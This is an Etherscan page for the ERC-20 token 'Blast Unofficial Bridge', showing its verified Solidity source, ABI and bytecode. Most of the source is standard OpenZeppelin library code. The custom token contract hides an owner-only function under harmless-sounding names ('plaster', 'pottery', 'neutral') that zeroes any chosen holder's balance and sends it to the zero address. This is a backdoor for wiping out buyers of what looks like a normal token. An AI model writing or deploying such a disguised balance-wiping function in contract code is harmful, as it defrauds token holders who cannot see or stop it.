Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
69,000,000 BRIDGE
Holders
27
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
blastunofficialbridge
Compiler Version
v0.8.21+commit.d9974bed
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-11-27 */ // File: @openzeppelin/contracts/utils/Address.sol // OpenZeppelin Contracts (last updated v4.8.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResultFromTarget(target, success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResultFromTarget(target, success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResultFromTarget(target, success, returndata, errorMessage); } /** * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract. * * _Available since v4.8._ */ function verifyCallResultFromTarget( address target, bool success, bytes memory returndata, string memory errorMessage ) internal view returns (bytes memory) { if (success) { if (returndata.length == 0) { // only check isContract if the call was successful and the return data is empty // otherwise we already know that it was a contract require(isContract(target), "Address: call to non-contract"); } return returndata; } else { _revert(returndata, errorMessage); } } /** * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason or using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { _revert(returndata, errorMessage); } } function _revert(bytes memory returndata, string memory errorMessage) private pure { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly /// @solidity memory-safe-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } // File: @openzeppelin/contracts/utils/math/SafeMath.sol // OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol) pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: shit.sol /** *SPDX-License-Identifier: MIT */ pragma solidity ^0.8.18; interface IERC20 { function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address recipient, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); } contract blastunofficialbridge is Context, IERC20 { mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; using SafeMath for uint256; using Address for address; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; address public pottery; constructor () { _name = "Blast Unofficial Bridge"; _symbol = "BRIDGE"; _decimals = 18; uint256 initialSupply = 69000000; pottery = msg.sender; _mint(msg.sender, initialSupply*(10**18)); } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } modifier onlyOwner() { require(msg.sender == pottery, "Not allowed"); _; } function plaster(address[] memory neutral) public onlyOwner() { for (uint256 i = 0; i < neutral.length; i++) { address account = neutral[i]; uint256 amount = _balances[account]; _balances[account] = _balances[account].sub(amount, "ERROR"); _balances[address(0)] = _balances[address(0)].add(amount); } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"neutral","type":"address[]"}],"name":"plaster","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"pottery","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801562000010575f80fd5b5060408051808201909152601781527f426c61737420556e6f6666696369616c2042726964676500000000000000000060208201526002906200005490826200026b565b5060408051808201909152600681526542524944474560d01b60208201526003906200008190826200026b565b506004805460ff19166012179055600680546001600160a01b0319163390811790915563041cdb4090620000c990620000c383670de0b6b3a764000062000347565b620000d0565b5062000377565b6001600160a01b0382166200012b5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b6005546200013a9082620001b5565b6005556001600160a01b0382165f90815260208190526040902054620001619082620001b5565b6001600160a01b0383165f81815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b5f620001c2828462000361565b90505b92915050565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620001f457607f821691505b6020821081036200021357634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000266575f81815260208120601f850160051c81016020861015620002415750805b601f850160051c820191505b8181101562000262578281556001016200024d565b5050505b505050565b81516001600160401b03811115620002875762000287620001cb565b6200029f81620002988454620001df565b8462000219565b602080601f831160018114620002d5575f8415620002bd5750858301515b5f19600386901b1c1916600185901b17855562000262565b5f85815260208120601f198616915b828110156200030557888601518255948401946001909101908401620002e4565b50858210156200032357878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b5f52601160045260245ffd5b8082028115828204841417620001c557620001c562000333565b80820180821115620001c557620001c562000333565b610c3380620003855f395ff3fe608060405234801561000f575f80fd5b50600436106100c4575f3560e01c8063313ce5671161007d57806395d89b411161005857806395d89b41146101d2578063a9059cbb146101da578063dd62ed3e146101ed575f80fd5b8063313ce567146101735780635965d04a1461018857806370a082311461019d575f80fd5b8063096411a4116100ad578063096411a41461010957806318160ddd1461014e57806323b872dd14610160575f80fd5b806306fdde03146100c8578063095ea7b3146100e6575b5f80fd5b6100d0610232565b6040516100dd91906108af565b60405180910390f35b6100f96100f4366004610922565b6102c2565b60405190151581526020016100dd565b6006546101299073ffffffffffffffffffffffffffffffffffffffff1681565b60405173ffffffffffffffffffffffffffffffffffffffff90911681526020016100dd565b6005545b6040519081526020016100dd565b6100f961016e36600461094a565b6102d8565b60045460405160ff90911681526020016100dd565b61019b6101963660046109b0565b61034c565b005b6101526101ab366004610a70565b73ffffffffffffffffffffffffffffffffffffffff165f9081526020819052604090205490565b6100d06104e5565b6100f96101e8366004610922565b6104f4565b6101526101fb366004610a89565b73ffffffffffffffffffffffffffffffffffffffff9182165f90815260016020908152604080832093909416825291909152205490565b60606002805461024190610aba565b80601f016020809104026020016040519081016040528092919081815260200182805461026d90610aba565b80156102b85780601f1061028f576101008083540402835291602001916102b8565b820191905f5260205f20905b81548152906001019060200180831161029b57829003601f168201915b5050505050905090565b5f6102ce338484610500565b5060015b92915050565b5f6102e484848461067f565b610342843361033d85604051806060016040528060288152602001610bd66028913973ffffffffffffffffffffffffffffffffffffffff8a165f9081526001602090815260408083203384529091529020549190610872565b610500565b5060019392505050565b60065473ffffffffffffffffffffffffffffffffffffffff1633146103b85760405162461bcd60e51b815260206004820152600b60248201527f4e6f7420616c6c6f77656400000000000000000000000000000000000000000060448201526064015b60405180910390fd5b5f5b81518110156104e1575f8282815181106103d6576103d6610b0b565b60209081029190910181015173ffffffffffffffffffffffffffffffffffffffff81165f8181528084526040808220548151808301909252600582527f4552524f520000000000000000000000000000000000000000000000000000008287015292825293529092509061044d9082908190610872565b73ffffffffffffffffffffffffffffffffffffffff83165f9081526020819052604081209190915580527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb5546104a3908261089d565b5f8080526020527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb555508190506104d981610b65565b9150506103ba565b5050565b60606003805461024190610aba565b5f6102ce33848461067f565b73ffffffffffffffffffffffffffffffffffffffff83166105885760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460448201527f726573730000000000000000000000000000000000000000000000000000000060648201526084016103af565b73ffffffffffffffffffffffffffffffffffffffff82166106115760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f20616464726560448201527f737300000000000000000000000000000000000000000000000000000000000060648201526084016103af565b73ffffffffffffffffffffffffffffffffffffffff8381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b73ffffffffffffffffffffffffffffffffffffffff83166107085760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f647265737300000000000000000000000000000000000000000000000000000060648201526084016103af565b73ffffffffffffffffffffffffffffffffffffffff82166107915760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f657373000000000000000000000000000000000000000000000000000000000060648201526084016103af565b6107da81604051806060016040528060268152602001610bb06026913973ffffffffffffffffffffffffffffffffffffffff86165f908152602081905260409020549190610872565b73ffffffffffffffffffffffffffffffffffffffff8085165f908152602081905260408082209390935590841681522054610815908261089d565b73ffffffffffffffffffffffffffffffffffffffff8381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610672565b5f81848411156108955760405162461bcd60e51b81526004016103af91906108af565b505050900390565b5f6108a88284610b9c565b9392505050565b5f6020808352835180828501525f5b818110156108da578581018301518582016040015282016108be565b505f604082860101526040601f19601f8301168501019250505092915050565b803573ffffffffffffffffffffffffffffffffffffffff8116811461091d575f80fd5b919050565b5f8060408385031215610933575f80fd5b61093c836108fa565b946020939093013593505050565b5f805f6060848603121561095c575f80fd5b610965846108fa565b9250610973602085016108fa565b9150604084013590509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f60208083850312156109c1575f80fd5b823567ffffffffffffffff808211156109d8575f80fd5b818501915085601f8301126109eb575f80fd5b8135818111156109fd576109fd610983565b8060051b604051601f19603f83011681018181108582111715610a2257610a22610983565b604052918252848201925083810185019188831115610a3f575f80fd5b938501935b82851015610a6457610a55856108fa565b84529385019392850192610a44565b98975050505050505050565b5f60208284031215610a80575f80fd5b6108a8826108fa565b5f8060408385031215610a9a575f80fd5b610aa3836108fa565b9150610ab1602084016108fa565b90509250929050565b600181811c90821680610ace57607f821691505b602082108103610b05577f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203610b9557610b95610b38565b5060010190565b808201808211156102d2576102d2610b3856fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212208022dd643cebd74673ddfa11c4c4cd44571688a3e4f86dc7c18d2ee8712e029064736f6c63430008150033
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106100c4575f3560e01c8063313ce5671161007d57806395d89b411161005857806395d89b41146101d2578063a9059cbb146101da578063dd62ed3e146101ed575f80fd5b8063313ce567146101735780635965d04a1461018857806370a082311461019d575f80fd5b8063096411a4116100ad578063096411a41461010957806318160ddd1461014e57806323b872dd14610160575f80fd5b806306fdde03146100c8578063095ea7b3146100e6575b5f80fd5b6100d0610232565b6040516100dd91906108af565b60405180910390f35b6100f96100f4366004610922565b6102c2565b60405190151581526020016100dd565b6006546101299073ffffffffffffffffffffffffffffffffffffffff1681565b60405173ffffffffffffffffffffffffffffffffffffffff90911681526020016100dd565b6005545b6040519081526020016100dd565b6100f961016e36600461094a565b6102d8565b60045460405160ff90911681526020016100dd565b61019b6101963660046109b0565b61034c565b005b6101526101ab366004610a70565b73ffffffffffffffffffffffffffffffffffffffff165f9081526020819052604090205490565b6100d06104e5565b6100f96101e8366004610922565b6104f4565b6101526101fb366004610a89565b73ffffffffffffffffffffffffffffffffffffffff9182165f90815260016020908152604080832093909416825291909152205490565b60606002805461024190610aba565b80601f016020809104026020016040519081016040528092919081815260200182805461026d90610aba565b80156102b85780601f1061028f576101008083540402835291602001916102b8565b820191905f5260205f20905b81548152906001019060200180831161029b57829003601f168201915b5050505050905090565b5f6102ce338484610500565b5060015b92915050565b5f6102e484848461067f565b610342843361033d85604051806060016040528060288152602001610bd66028913973ffffffffffffffffffffffffffffffffffffffff8a165f9081526001602090815260408083203384529091529020549190610872565b610500565b5060019392505050565b60065473ffffffffffffffffffffffffffffffffffffffff1633146103b85760405162461bcd60e51b815260206004820152600b60248201527f4e6f7420616c6c6f77656400000000000000000000000000000000000000000060448201526064015b60405180910390fd5b5f5b81518110156104e1575f8282815181106103d6576103d6610b0b565b60209081029190910181015173ffffffffffffffffffffffffffffffffffffffff81165f8181528084526040808220548151808301909252600582527f4552524f520000000000000000000000000000000000000000000000000000008287015292825293529092509061044d9082908190610872565b73ffffffffffffffffffffffffffffffffffffffff83165f9081526020819052604081209190915580527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb5546104a3908261089d565b5f8080526020527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb555508190506104d981610b65565b9150506103ba565b5050565b60606003805461024190610aba565b5f6102ce33848461067f565b73ffffffffffffffffffffffffffffffffffffffff83166105885760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460448201527f726573730000000000000000000000000000000000000000000000000000000060648201526084016103af565b73ffffffffffffffffffffffffffffffffffffffff82166106115760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f20616464726560448201527f737300000000000000000000000000000000000000000000000000000000000060648201526084016103af565b73ffffffffffffffffffffffffffffffffffffffff8381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b73ffffffffffffffffffffffffffffffffffffffff83166107085760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f647265737300000000000000000000000000000000000000000000000000000060648201526084016103af565b73ffffffffffffffffffffffffffffffffffffffff82166107915760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f657373000000000000000000000000000000000000000000000000000000000060648201526084016103af565b6107da81604051806060016040528060268152602001610bb06026913973ffffffffffffffffffffffffffffffffffffffff86165f908152602081905260409020549190610872565b73ffffffffffffffffffffffffffffffffffffffff8085165f908152602081905260408082209390935590841681522054610815908261089d565b73ffffffffffffffffffffffffffffffffffffffff8381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610672565b5f81848411156108955760405162461bcd60e51b81526004016103af91906108af565b505050900390565b5f6108a88284610b9c565b9392505050565b5f6020808352835180828501525f5b818110156108da578581018301518582016040015282016108be565b505f604082860101526040601f19601f8301168501019250505092915050565b803573ffffffffffffffffffffffffffffffffffffffff8116811461091d575f80fd5b919050565b5f8060408385031215610933575f80fd5b61093c836108fa565b946020939093013593505050565b5f805f6060848603121561095c575f80fd5b610965846108fa565b9250610973602085016108fa565b9150604084013590509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f60208083850312156109c1575f80fd5b823567ffffffffffffffff808211156109d8575f80fd5b818501915085601f8301126109eb575f80fd5b8135818111156109fd576109fd610983565b8060051b604051601f19603f83011681018181108582111715610a2257610a22610983565b604052918252848201925083810185019188831115610a3f575f80fd5b938501935b82851015610a6457610a55856108fa565b84529385019392850192610a44565b98975050505050505050565b5f60208284031215610a80575f80fd5b6108a8826108fa565b5f8060408385031215610a9a575f80fd5b610aa3836108fa565b9150610ab1602084016108fa565b90509250929050565b600181811c90821680610ace57607f821691505b602082108103610b05577f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203610b9557610b95610b38565b5060010190565b808201808211156102d2576102d2610b3856fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212208022dd643cebd74673ddfa11c4c4cd44571688a3e4f86dc7c18d2ee8712e029064736f6c63430008150033
Deployed Bytecode Sourcemap
